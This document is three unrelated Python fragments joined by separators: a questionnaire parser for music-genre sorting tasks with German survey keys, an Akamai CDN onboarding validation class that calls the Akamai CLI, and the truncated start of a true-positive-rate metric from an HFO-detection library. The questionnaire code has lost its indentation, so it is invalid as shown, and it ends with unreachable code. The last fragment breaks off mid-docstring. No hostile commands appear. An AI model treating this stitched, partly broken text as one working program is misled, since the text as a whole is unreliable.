q_data['rocknroll_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (RocknRoll)?'])
else:
f.write('missing_value_rocknroll_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre RocknRoll aus?' in q_json:
q_data['rocknroll_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre RocknRoll aus?'])
else:
f.write('missing_value_rocknroll_know\n')
# read out sortables rock - all
if 'rock' in q_json:
q_data_rock_all = q_json['rock']
if len(q_data_rock_all)==5:
for i in range(0, len(q_json['rock'])):
q_data['rock_all'][i] = str(q_json['rock'][i])
else:
f.write('rock_all_not_complete\n')
else:
f.write('rock_all_missing\n')
## read out sortables african-american
# read out sortables african-american - funk
q_data_funk_sortable = q_json['funk_sortable']
if len(q_data_funk_sortable)==10:
for i in range(0, len(q_json['funk_sortable'])):
q_data['funk_sortable'][i] = str(q_json['funk_sortable'][i])
else:
f.write('missing_value_funk_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Funk)?' in q_json:
q_data['funk_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Funk)?'])
else:
f.write('missing_value_funk_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Funk aus?' in q_json:
q_data['funk_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Funk aus?'])
else:
f.write('missing_value_funk_know\n')
# read out sortables african-american - hiphop
q_data_hiphop_sortable = q_json['hiphop_sortable']
if len(q_data_hiphop_sortable)==10:
for i in range(0, len(q_json['hiphop_sortable'])):
q_data['hiphop_sortable'][i] = str(q_json['hiphop_sortable'][i])
else:
f.write('missing_value_hiphop_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Hiphop)?' in q_json:
q_data['hiphop_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Hiphop)?'])
else:
f.write('missing_value_hiphop_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Hiphop aus?' in q_json:
q_data['hiphop_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Hiphop aus?'])
else:
f.write('missing_value_hiphop_know\n')
# read out sortables african-american - reggae
q_data_reggae_sortable = q_json['reggae_sortable']
if len(q_data_reggae_sortable)==10:
for i in range(0, len(q_json['reggae_sortable'])):
q_data['reggae_sortable'][i] = str(q_json['reggae_sortable'][i])
else:
f.write('missing_value_reggae_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Reggae)?' in q_json:
q_data['reggae_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Reggae)?'])
else:
f.write('missing_value_reggae_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Reggae aus?' in q_json:
q_data['reggae_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Reggae aus?'])
else:
f.write('missing_value_reggae_know\n')
# read out sortables african-american - rnb
q_data_rnb_sortable = q_json['rnb_sortable']
if len(q_data_rnb_sortable)==10:
for i in range(0, len(q_json['rnb_sortable'])):
q_data['rnb_sortable'][i] = str(q_json['rnb_sortable'][i])
else:
f.write('missing_value_rnb_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (RnB)?' in q_json:
q_data['rnb_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (RnB)?'])
else:
f.write('missing_value_rnb_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre RnB aus?' in q_json:
q_data['rnb_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre RnB aus?'])
else:
f.write('missing_value_rnb_know\n')
# read out sortables african-american - soul
q_data_soul_sortable = q_json['soul_sortable']
if len(q_data_soul_sortable)==10:
for i in range(0, len(q_json['soul_sortable'])):
q_data['soul_sortable'][i] = str(q_json['soul_sortable'][i])
else:
f.write('missing_value_soul_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Soul)?' in q_json:
q_data['soul_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Soul)?'])
else:
f.write('missing_value_soul_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Soul aus?' in q_json:
q_data['soul_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Soul aus?'])
else:
f.write('missing_value_soul_know\n')
# read out sortables african-american - all
if 'african_american' in q_json:
q_data_african_american_all = q_json['african_american']
if len(q_data_african_american_all)==5:
for i in range(0, len(q_json['african_american'])):
q_data['african_american_all'][i] = str(q_json['african_american'][i])
else:
f.write('african_american_all_not_complete\n')
else:
f.write('african_american_all_missing\n')
## read out sortables classic
# read out sortables classic - baroque
q_data_baroque_sortable = q_json['baroque_sortable']
if len(q_data_baroque_sortable)==10:
for i in range(0, len(q_json['baroque_sortable'])):
q_data['baroque_sortable'][i] = str(q_json['baroque_sortable'][i])
else:
f.write('missing_value_baroque_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Barock)?' in q_json:
q_data['baroque_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Barock)?'])
else:
f.write('missing_value_baroque_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Barock aus?' in q_json:
q_data['baroque_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Barock aus?'])
else:
f.write('missing_value_baroque_know\n')
# read out sortables classic - viennese_classic
q_data_viennese_classic_sortable = q_json['viennese_classic_sortable']
if len(q_data_viennese_classic_sortable)==10:
for i in range(0, len(q_json['viennese_classic_sortable'])):
q_data['viennese_classic_sortable'][i] = str(q_json['viennese_classic_sortable'][i])
else:
f.write('missing_value_viennese_classic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Wiener Klassik)?' in q_json:
q_data['viennese_classic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Wiener Klassik)?'])
else:
f.write('missing_value_viennese_classic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Wiener Klassik aus?' in q_json:
q_data['viennese_classic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Wiener Klassik aus?'])
else:
f.write('missing_value_viennese_classic_know\n')
# read out sortables classic - modernclassic
q_data_modern_classic_sortable = q_json['modernclassic_sortable']
if len(q_data_modern_classic_sortable)==10:
for i in range(0, len(q_json['modernclassic_sortable'])):
q_data['modern_classic_sortable'][i] = str(q_json['modernclassic_sortable'][i])
else:
f.write('missing_value_modern_classic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Moderne Klassik)?' in q_json:
q_data['modern_classic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Moderne Klassik)?'])
else:
f.write('missing_value_modern_classic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Moderne Klassik aus?' in q_json:
q_data['modern_classic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Moderne Klassik aus?'])
else:
f.write('missing_value_modern_classic_know\n')
# read out sortables classic - renaissance
q_data_renaissance_sortable = q_json['renaissance_sortable']
if len(q_data_renaissance_sortable)==10:
for i in range(0, len(q_json['renaissance_sortable'])):
q_data['renaissance_sortable'][i] = str(q_json['renaissance_sortable'][i])
else:
f.write('missing_value_renaissance_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Renaissance Musik)?' in q_json:
q_data['renaissance_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Renaissance Musik)?'])
else:
f.write('missing_value_renaissance_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Renaissance Musik aus?' in q_json:
q_data['renaissance_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Renaissance Musik aus?'])
else:
f.write('missing_value_renaissance_know\n')
# read out sortables classic - romantic
q_data_romantic_sortable = q_json['romantic_sortable']
if len(q_data_romantic_sortable)==10:
for i in range(0, len(q_json['romantic_sortable'])):
q_data['romantic_sortable'][i] = str(q_json['romantic_sortable'][i])
else:
f.write('missing_value_romantic_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Romantik)?' in q_json:
q_data['romantic_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Romantik)?'])
else:
f.write('missing_value_romantic_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Musik der Romantik aus?' in q_json:
q_data['romantic_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Musik der Romantik aus?'])
else:
f.write('missing_value_romantic_know\n')
# read out sortables classic - all
if 'classic' in q_json:
q_data_classic_all = q_json['classic']
if len(q_data_classic_all)==5:
for i in range(0, len(q_json['classic'])):
q_data['classic_all'][i] = str(q_json['classic'][i])
else:
f.write('classic_all_not_complete\n')
else:
f.write('classic_all_missing\n')
## read out sortables electro
# read out sortables electro - deephouse
q_data_deephouse_sortable = q_json['deephouse_sortable']
if len(q_data_deephouse_sortable)==10:
for i in range(0, len(q_json['deephouse_sortable'])):
q_data['deephouse_sortable'][i] = str(q_json['deephouse_sortable'][i])
else:
f.write('missing_value_deephouse_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Deep House)?' in q_json:
q_data['deephouse_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Deep House)?'])
else:
f.write('missing_value_deephouse_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Deep House aus?' in q_json:
q_data['deephouse_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Deep House aus?'])
else:
f.write('missing_value_deephouse_know\n')
# read out sortables electro - drumnbass
q_data_drumnbass_sortable = q_json['drumnbass_sortable']
if len(q_data_drumnbass_sortable)==10:
for i in range(0, len(q_json['drumnbass_sortable'])):
q_data['drumnbass_sortable'][i] = str(q_json['drumnbass_sortable'][i])
else:
f.write('missing_value_drumnbass_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (DrumnBass)?' in q_json:
q_data['drumnbass_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (DrumnBass)?'])
else:
f.write('missing_value_drumnbass_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre DrumnBass aus?' in q_json:
q_data['drumnbass_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre DrumnBass aus?'])
else:
f.write('missing_value_drumnbass_know\n')
# read out sortables electro - dubstep
q_data_dubstep_sortable = q_json['dubstep_sortable']
if len(q_data_dubstep_sortable)==10:
for i in range(0, len(q_json['dubstep_sortable'])):
q_data['dubstep_sortable'][i] = str(q_json['dubstep_sortable'][i])
else:
f.write('missing_value_dubstep_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Dubstep)?' in q_json:
q_data['dubstep_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Dubstep)?'])
else:
f.write('missing_value_dubstep_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Dubstep aus?' in q_json:
q_data['dubstep_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Dubstep aus?'])
else:
f.write('missing_value_dubstep_know\n')
# read out sortables electro - techno
q_data_techno_sortable = q_json['techno_sortable']
if len(q_data_techno_sortable)==10:
for i in range(0, len(q_json['techno_sortable'])):
q_data['techno_sortable'][i] = str(q_json['techno_sortable'][i])
else:
f.write('missing_value_techno_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Techno)?' in q_json:
q_data['techno_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Techno)?'])
else:
f.write('missing_value_techno_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Techno aus?' in q_json:
q_data['techno_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Techno aus?'])
else:
f.write('missing_value_techno_know\n')
# read out sortables electro - trance
q_data_trance_sortable = q_json['trance_sortable']
if len(q_data_trance_sortable)==10:
for i in range(0, len(q_json['trance_sortable'])):
q_data['trance_sortable'][i] = str(q_json['trance_sortable'][i])
else:
f.write('missing_value_trance_sortable')
if 'Wie sicher sind Sie sich bei dieser Zuordnung (Trance)?' in q_json:
q_data['trance_sortable_sure'][0] = int(q_json['Wie sicher sind Sie sich bei dieser Zuordnung (Trance)?'])
else:
f.write('missing_value_trance_sortable_sure\n')
if 'Wie gut kennen Sie sich im Genre Trance aus?' in q_json:
q_data['trance_know'][0] = int(q_json['Wie gut kennen Sie sich im Genre Trance aus?'])
else:
f.write('missing_value_trance_know\n')
# read out sortables electro - all
if 'electro' in q_json:
q_data_electro_all = q_json['electro']
if len(q_data_electro_all)==5:
for i in range(0, len(q_json['electro'])):
q_data['electro_all'][i] = str(q_json['electro'][i])
else:
f.write('electro_all_not_complete\n')
else:
f.write('electro_all_missing\n')
### save data frame to csv
# read out id
id=str(json_file.split('ergebnisstring_', 1)[1].split('.json',1)[0])
# assign id
q_data['id']=id
q_data.to_csv('data_questionnaire_' + id + '.csv')
return q_data
f.close()
|
from shutil import which
import subprocess
import json
from urllib import parse
import os
from distutils.dir_util import copy_tree
import shutil
import os
class utility(object):
    """Validation and shell-command helpers for the onboarding workflow.

    All validators update the shared ``self.valid`` flag instead of
    returning individual error codes; a final check of the flag replaces
    many IF conditions in the caller.
    """
    def __init__(self):
        """
        Initialize the common status indicator.

        This variable should be updated by every function defined in
        validation modules to indicate validation status.
        This avoids usage of too many IF conditions.
        """
        #Initialize the variable to true
        self.valid = True
    def installedCommandCheck(self, command_name):
        """
        Check that an external command is installed (findable on PATH).

        NOTE(review): on failure this calls exit(-1) and terminates the
        whole process; the returns after it are unreachable.
        """
        if which(command_name) is None:
            #Failure state: the command is NOT installed
            print('\nThis program needs ' + command_name + ' as a pre-requisite')
            if command_name == 'akamai':
                print('Please install from https://github.com/akamai/cli')
            else:
                #Default print statement
                print('\n' + command_name + ' is not installed')
            #Common assignment for Failure cases
            self.valid = False
            exit(-1)
            # unreachable: exit(-1) above terminates the interpreter
            return self.valid
        else:
            #This is a success state, the command is installed
            return self.valid
        #Default Return, ideally code shouldnt come here
        return self.valid
    def executeCommand(self, command):
        """
        Execute a command (argument list) and check its combined output.

        Used to verify the akamai 'pipeline' CLI module is installed:
        if the bare akamai help text comes back, the module is missing.
        NOTE(review): exits the process via exit(-1) on that failure.
        """
        childprocess = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT)
        stdout,stderr = childprocess.communicate()
        # membership test on the argument list, not a substring search
        if 'pipeline' in command:
            if 'akamai [global flags]' in str(stdout):
                #Check specifically for akamai pipeline
                print('\nThis program needs akamai CLI module property-manager as a pre-requisite')
                print('Please install from https://github.com/akamai/cli-property-manager')
                #Common assignment for Failure cases
                self.valid = False
                exit(-1)
                # unreachable after exit(-1)
                return self.valid
            else:
                return self.valid
        #Default Return, ideally code shouldnt come here
        return self.valid
    def checkPermissions(self, session, apicalls_wrapper_object):
        """
        Print the API scopes granted to the current credential.

        Always returns ``self.valid`` unchanged; purely informational.
        """
        #This function is not used. Helpful in future if we want to check permissions of credential
        credential_details_response = apicalls_wrapper_object.checkAuthorization(session)
        print(json.dumps(credential_details_response.json(), indent=4))
        if credential_details_response.status_code == 200:
            for scope in credential_details_response.json()['scope'].split(" "):
                o = parse.urlparse(scope)
                apis = o.path.split("/")
                # assumes scope URLs have at least 6 path segments — TODO confirm
                print('{0:35} {1:10}'.format(apis[3], apis[5]))
        else:
            pass
        #Default Return, ideally code shouldnt come here
        return self.valid
    def validateSetupSteps(self, session, onboard_object, wrapper_object):
        """
        Validate the input values of setup.json.

        Checks cross-field consistency of the onboarding configuration
        (network type, file vs folder mode, activation ordering, WAF
        prerequisites), then verifies product id, edge hostnames, input
        files and WAF config against the live API via wrapper_object.
        Accumulates failures in ``self.valid``; early-returns False only
        for a handful of hard errors.
        """
        if onboard_object.secure_network != 'ENHANCED_TLS' and onboard_object.secure_network != 'STANDARD_TLS':
            print('ERROR: secure_network must be either ENHANCED_TLS or STANDARD_TLS')
            self.valid = False
            return False
        if onboard_object.use_file is True and onboard_object.use_folder is True:
            print('ERROR: Both use_file and use_folder cannot be set to true')
            self.valid = False
            return False
        if onboard_object.use_file is not True and onboard_object.use_folder is not True:
            print('ERROR: Either use_file or use_folder must be set to true')
            self.valid = False
            return False
        if onboard_object.create_new_cpcode is True:
            if onboard_object.new_cpcode_name == "":
                print('ERROR: If create_new_cpcode is true, new_cpcode_name must be specified')
                self.valid = False
        if onboard_object.use_file is True:
            if onboard_object.source_template_file == "":
                print('ERROR: If use_file is true, source_template_file must be specified')
                self.valid = False
            if onboard_object.source_values_file == "":
                print('ERROR: If use_file is true, source_values_file must be specified')
                self.valid = False
        if onboard_object.use_folder is True:
            if onboard_object.folder_path == "":
                print('ERROR: If use_folder is true, folder_path must be specified')
                self.valid = False
            if onboard_object.env_name == "":
                print('ERROR: If use_folder is true, env_name must be specified')
                self.valid = False
        # Activation ordering: PRODUCTION requires STAGING first
        if onboard_object.activate_property_production is True:
            if onboard_object.activate_property_staging is not True:
                print('ERROR: Must activate property to STAGING before activating to PRODUCTION')
                self.valid = False
            else:
                pass
        # WAF prerequisites form a chain: selected hosts -> match target -> activation
        if onboard_object.add_selected_host is True:
            if onboard_object.activate_property_staging is not True:
                print('ERROR: If adding WAF selected hosts, property must be activated to STAGING')
                self.valid = False
            else:
                pass
        if onboard_object.update_match_target is True:
            if onboard_object.activate_property_staging is not True:
                print('ERROR: If adding WAF match target, property must be activated to STAGING')
                self.valid = False
            else:
                pass
        if onboard_object.update_match_target is True:
            if onboard_object.add_selected_host is not True:
                print('ERROR: If adding WAF match target, must be added to WAF selected hosts')
                self.valid = False
            else:
                pass
        if onboard_object.activate_waf_policy_staging is True:
            if onboard_object.add_selected_host is not True:
                print('ERROR: If activating WAF policy to STAGING, must at least add WAF selected hosts')
                self.valid = False
            else:
                pass
        if onboard_object.activate_waf_policy_production is True:
            if onboard_object.activate_waf_policy_staging is not True:
                print('ERROR: Must activate WAF policy to STAGING before activating to PRODUCTION.')
                self.valid = False
            else:
                pass
        #Check if product_id is valid for contract
        print('Checking if valid product_id: ' + onboard_object.product_id)
        product_detail = self.validateProductId(session, wrapper_object, onboard_object.contract_id, onboard_object.product_id)
        if product_detail['Found'] is True:
            print('Confirmed valid product_id')
        else:
            print('ERROR: Invalid product_id for contract: ' + onboard_object.contract_id)
            print('ERROR: Please select from valid product_ids for this contract: ' + str(product_detail['products']))
            self.valid = False
        if onboard_object.edge_hostname_mode == 'use_existing_edgehostname':
            if self.valid:
                print('\nedge_hostname_mode = use_existing_edgehostname\n')
            if onboard_object.edge_hostname == "":
                print('ERROR: If use_existing_edgehostname, edge_hostname is mandatory')
                self.valid = False
            else:
                # Suffix must match the chosen secure network type
                if onboard_object.secure_network == 'ENHANCED_TLS':
                    if not str(onboard_object.edge_hostname).endswith('edgekey.net'):
                        print('ERROR: If secure_network is ENHANCED_TLS, existing edge_hostname must end with edgekey.net')
                        self.valid = False
                        return False
                elif onboard_object.secure_network == 'STANDARD_TLS':
                    if not str(onboard_object.edge_hostname).endswith('edgesuite.net'):
                        print('ERROR: If secure_network is STANDARD_TLS, existing edge_hostname must end with edgesuite.net')
                        self.valid = False
                        return False
                #Validate edgehostname and validate the necessary
                if self.valid:
                    #Check the validity of edgehostname
                    print('Checking if valid edge_hostname: ' + str(onboard_object.edge_hostname))
                    ehn_id = self.validateEdgeHostnameExists(session, wrapper_object, str(onboard_object.edge_hostname))
                    if ehn_id > 0:
                        print('Confirmed valid edge_hostname: ehn_' + str(ehn_id))
                        onboard_object.edge_hostname_id = ehn_id
                    else:
                        print('ERROR: edge_hostname is not found')
                        self.valid = False
        if onboard_object.edge_hostname_mode == 'new_standard_tls_edgehostname':
            print('\nedge_hostname_mode = new_standard_tls_edgehostname\n')
            if onboard_object.secure_network != 'STANDARD_TLS':
                print('ERROR: For new_standard_tls_edgehostname, secure_network must be STANDARD_TLS')
                self.valid = False
                return False
        if onboard_object.edge_hostname_mode == 'new_enhanced_tls_edgehostname':
            print('\nedge_hostname_mode = new_enhanced_tls_edgehostname\n')
            if onboard_object.secure_network != 'ENHANCED_TLS':
                print('ERROR: For new_enhanced_tls_edgehostname, secure_network must be ENHANCED_TLS')
                self.valid = False
                return False
            if onboard_object.use_existing_enrollment_id is True:
                if onboard_object.create_new_ssl_cert is True:
                    print('ERROR: Both use_existing_enrollment_id and create_new_ssl_cert cannot be set to true')
                    self.valid = False
                if onboard_object.existing_enrollment_id == "":
                    print('ERROR: If use_existing_enrollment_id is true, existing_enrollment_id is mandatory')
                    self.valid = False
                if onboard_object.existing_slot_number == "":
                    print('ERROR: If use_existing_enrollment_id is true, existing_slot_number is mandatory')
                    self.valid = False
            elif onboard_object.create_new_ssl_cert is True:
                if onboard_object.temp_existing_edge_hostname == "":
                    print('ERROR: If create_new_ssl_cert is true, temp_existing_edge_hostname must be specified')
                    self.valid = False
                else:
                    if onboard_object.secure_network == 'ENHANCED_TLS':
                        if not str(onboard_object.temp_existing_edge_hostname).endswith('edgekey.net'):
                            print('ERROR: If secure_network is ENHANCED_TLS, temp_existing_edge_hostname must end with edgekey.net')
                            self.valid = False
                            return False
                    if onboard_object.ssl_cert_template_file is None or onboard_object.ssl_cert_template_values is None:
                        print('ERROR: If create_new_ssl_cert is true, ssl_cert_template_file and ssl_cert_template_values must be specified')
                        self.valid = False
                    if self.validateFile(onboard_object.ssl_cert_template_file):
                        if self.validateFile(onboard_object.ssl_cert_template_values):
                            pass
                        else:
                            #File does not exist
                            print('ERROR: ' + onboard_object.ssl_cert_template_values + ' does not exist')
                            self.valid = False
                    else:
                        #File does not exist
                        print('ERROR: ' + onboard_object.ssl_cert_template_file + ' does not exist')
                        self.valid = False
                    #Validate the temp_existing_edge_hostname
                    if self.valid:
                        print('Checking if valid temp_existing_edge_hostname: ' + str(onboard_object.temp_existing_edge_hostname))
                        ehn_id = self.validateEdgeHostnameExists(session, wrapper_object, str(onboard_object.temp_existing_edge_hostname))
                        if ehn_id > 0:
                            print('Confirmed valid temp_existing_edge_hostname: ehn_' + str(ehn_id))
                            onboard_object.edge_hostname_id = ehn_id
                        else:
                            print('ERROR: temp_existing_edge_hostname is not found')
                            self.valid = False
        if onboard_object.use_file is True:
            if self.validateFile(onboard_object.source_template_file):
                if self.validateFile(onboard_object.source_values_file):
                    pass
                else:
                    #File does not exist
                    print('ERROR: ' + onboard_object.source_values_file + ' does not exist')
                    self.valid = False
            else:
                #File does not exist
                print('ERROR: ' + onboard_object.source_template_file + ' does not exist')
                self.valid = False
        #If supposed to something with WAF, can we find waf_config_id for the specifed name
        if onboard_object.add_selected_host is True:
            print('\nChecking if valid waf_config_name: ' + onboard_object.waf_config_name)
            config_detail = self.getWafConfigIdByName(session, wrapper_object,onboard_object.waf_config_name)
            if config_detail['Found'] is True:
                onboard_object.onboard_waf_config_id = config_detail['details']['id']
                print('Found valid waf_config_id: ' + str(onboard_object.onboard_waf_config_id))
                onboard_object.onboard_waf_prev_version = config_detail['details']['latestVersion']
            else:
                print('ERROR: Unable to find valid waf configuration for waf_config_name: ' + onboard_object.waf_config_name)
                self.valid = False
        #Default Return, only use this return as every settings needs to be checked
        return self.valid
    #Validate file
    def validateFile(self, file_location):
        """Return True if ``file_location`` exists and is a regular file."""
        if os.path.isfile(file_location):
            return True
        else:
            return False
    def validateProductId(self, session, wrapper_object, contract_id, product_id):
        """
        Validate product ids for a contract.

        Returns a dict with 'Found' (bool) and 'products' (list).
        NOTE(review): the product list is only appended to inside the
        match branch, so 'products' holds at most the matching id, not
        the full catalogue the error message implies.
        """
        products = dict()
        products['Found'] = False
        products['products'] = []
        get_products_response = wrapper_object.getProductsByContract(session, contract_id)
        if get_products_response.status_code == 200:
            items = get_products_response.json()['products']['items']
            for each_item in items:
                if 'productId' in each_item:
                    # case-insensitive comparison of product ids
                    if each_item['productId'].lower() == product_id.lower():
                        products['Found'] = True
                    products['products'].append(each_item['productId'])
                else:
                    pass
        else:
            print(json.dumps(get_products_response.json(), indent=4))
            pass
        return products
    def validateEdgeHostnameExists(self, session, wrapper_object, edge_hostname):
        """
        Look up an edge hostname and return its numeric id (0 if absent).
        """
        ehn_id = 0
        edgehostname_response = wrapper_object.checkEdgeHostname(session, edge_hostname)
        # The API lists record names without the Akamai domain suffix
        record_name = edge_hostname
        if str(edge_hostname).endswith('edgekey.net'):
            record_name = str(edge_hostname).split('.edgekey.net')[0]
        elif str(edge_hostname).endswith('edgesuite.net'):
            record_name = str(edge_hostname).split('.edgesuite.net')[0]
        if edgehostname_response.status_code == 200:
            ehns = edgehostname_response.json()['edgeHostnames']
            for every_ehn in ehns:
                if every_ehn['recordName'] == record_name:
                    ehn_id = every_ehn['edgeHostnameId']
                    return ehn_id
                else:
                    pass
        else:
            print(json.dumps(edgehostname_response.json(), indent=4))
            return 0
        return ehn_id
    def getWafConfigIdByName(self, session, wrapper_object, config_name):
        """
        Get WAF config details by exact name.

        Returns a dict with 'Found' (bool) and, when found, 'details'
        (the raw configuration record including id and latestVersion).
        """
        config_detail = dict()
        config_detail['Found'] = False
        waf_configs_response = wrapper_object.getWafConfigurations(session)
        if waf_configs_response.status_code == 200:
            configurations = waf_configs_response.json()['configurations']
            for each_config in configurations:
                if 'name' in each_config:
                    if each_config['name'] == config_name:
                        config_detail['Found'] = True
                        config_detail['details'] = each_config
                    else:
                        pass
                else:
                    pass
        else:
            pass
        return config_detail
    def doCliPipelineMerge(self, onboard_object, create_mode=True, merge_type="pm"):
        """
        Use the Akamai property-manager CLI to merge a template.

        In create_mode, builds a throwaway pipeline project folder
        (temp_pm or temp_cps) from the template/values files; otherwise
        copies onboard_object.folder_path into temp_pm. Then shells out
        to 'akamai pipeline merge' and returns True on exit code 0.
        """
        #For PM merge, it will use temp_pm folder
        #For CPS merge, it will use temp_cps folder
        #Delete these folders if they exist to start
        # NOTE(review): FILE is opened but never written or closed — looks
        # like a leftover; confirm before removing
        FILE = open('command_output', 'w')
        if os.path.exists('temp_pm'):
            shutil.rmtree('temp_pm')
        if os.path.exists('temp_cps'):
            shutil.rmtree('temp_cps')
        # Best-effort cleanup of CLI log files from earlier runs
        try:
            os.remove('devops.log')
        except:
            pass
        try:
            os.remove('devops-logs.log')
        except:
            pass
        try:
            if create_mode:
                #Build projectInfo contents
                projectInfo = dict(environments = ['test'], name = 'temp_' + merge_type)
                #Create pipeline specific folders are files
                if not os.path.exists(os.path.join('temp_' + merge_type,'dist')):
                    os.makedirs(os.path.join('temp_' + merge_type,'dist'))
                if not os.path.exists(os.path.join('temp_' + merge_type,'environments','test')):
                    os.makedirs(os.path.join('temp_' + merge_type,'environments','test'))
                if not os.path.exists(os.path.join('temp_' + merge_type,'templates')):
                    os.makedirs(os.path.join('temp_' + merge_type,'templates'))
                with open(os.path.join('temp_' + merge_type,'projectInfo.json'),'w') as projectFile:
                    projectFile.write(json.dumps(projectInfo, indent=4))
                #Create main.json with contents of templateContent
                with open(onboard_object.source_template_file,'r') as templateHandler:
                    templateData = json.load(templateHandler)
                with open(os.path.join('temp_' + merge_type,'templates','main.json'),'w') as mainContentHandler:
                    mainContentHandler.write(json.dumps(templateData, indent=4))
                #create values file for test env from variables
                with open(onboard_object.source_values_file,'r') as valuesHandler, \
                    open(os.path.join('temp_' + merge_type,'environments','test','variables.json'),'w') as testValuesHandler:
                    value_json = valuesHandler.read()
                    testValuesHandler.write(value_json)
                #prepare the variable definitions file contents
                varDefinitions = {}
                varDefinitions['definitions'] = {}
                for eachKey in json.loads(value_json).keys():
                    varDefinitions['definitions'][eachKey] = {}
                    varDefinitions['definitions'][eachKey]['default'] = ""
                    varDefinitions['definitions'][eachKey]['type'] = "userVariableValue"
                with open(os.path.join('temp_' + merge_type,'environments','variableDefinitions.json'),'w') as definitionHandler:
                    definitionHandler.write(json.dumps(varDefinitions, indent=4))
                #Create envInfo.json else it will error out
                testEnvInfo = dict(name = "test")
                with open(os.path.join('temp_' + merge_type,'environments','test','envInfo.json'),'w') as testValuesHandler:
                    testValuesHandler.write(json.dumps(testEnvInfo, indent=4))
                #Run pipeline merge
                if merge_type == "pm":
                    command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_pm', 'test', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
                    child_process = subprocess.Popen(command,
                                        stdout=subprocess.PIPE,
                                        stderr=subprocess.STDOUT)
                    stdout,stderr = child_process.communicate()
                    rtn_code = child_process.returncode
                else:
                    command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_cps', 'test', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
                    child_process = subprocess.Popen(command,
                                        stdout=subprocess.PIPE,
                                        stderr=subprocess.STDOUT)
                    stdout,stderr = child_process.communicate()
                    rtn_code = child_process.returncode
            else:
                #Copy the folder and run pipeline merge
                copy_tree(onboard_object.folder_path, 'temp_pm')
                command = ['akamai', 'pipeline', 'merge', '-n', '-p', 'temp_pm', '--edgerc', onboard_object.edgerc, '--section', onboard_object.section]
                child_process = subprocess.Popen(command,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.STDOUT)
                stdout,stderr = child_process.communicate()
                rtn_code = child_process.returncode
            #if pipeline merge command was not successful, return false
            if rtn_code != 0:
                print('\n Merging the template file failed')
                return False
            #process call worked, return true
            return True
        except Exception as e:
            print(e)
            print('\nERROR: Exception occurred while trying to merge. Check devops-logs.log and/or temp_* folder to see if files were copied or merged correctly')
            return False
|
<gh_stars>1-10
import numpy as np
import pandas as pd
from mne_hfo.posthoc import match_detected_annotations
from mne_hfo.sklearn import _convert_y_sklearn_to_annot_df
from mne_hfo.utils import _check_df
def true_positive_rate(y, y_pred):
    """
    Calculate true positive rate as: tpr = tp / (tp + fn).

    Parameters
    ----------
    y : pd.DataFrame
        Event Dataframe with actual labels
